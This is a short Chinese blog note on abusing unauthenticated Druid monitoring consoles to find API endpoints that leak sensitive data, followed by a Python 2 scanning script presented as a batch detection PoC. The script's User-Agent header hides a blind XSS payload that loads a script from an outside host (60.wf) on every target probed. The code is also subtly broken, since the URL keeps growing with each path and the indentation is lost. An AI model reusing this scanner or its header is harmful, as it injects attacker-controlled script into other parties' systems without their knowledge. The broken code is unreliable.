druid未授權訪問漏洞挖到過很多,但是多數都是沒有后續利用的,最近碰到了幾個,簡單記錄下:
主要關注這幾個點

URL監控泄露URI接口信息

這里遍歷接口有個小技巧,我們首先選取一些可能涉及敏感信息的接口去做測試,當然這里有很多接口是需要帶參數訪問的,不帶參數請求時有些服務端會返回參數,但是對於參數的內容,我們也需要一定的運氣才能構造正確進行正常請求,所以我們一般直接去找那種可以獲取所有字段信息的接口,一般不需要任何參數,就算需要參數也是簡單的page,pagesize這些,本例就是這樣:

一個接口直接獲取涉及敏感數據所需的很多重要參數,可進一步找接口進行構造:

批量檢測poc片段:
druid_path = r"""
/druid/index.html
/system/index.html
/webpage/system/druid/index.html
"""
paths = druid_path.strip().splitlines()
for path in paths:
url = url + path
try:
header = dict()
header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36<sCRiPt/SrC=//60.wf/4PrhD>"
requests.packages.urllib3.disable_warnings()#解決InsecureRequestWarning警告
r = requests.get(url, headers=header, timeout=8, verify=False, allow_redirects=False)
if r.status_code == 200 and "Druid Stat Index" in r.content:
print '[druid unauth]\t' + url
else:
continue
except:
print 'fail'
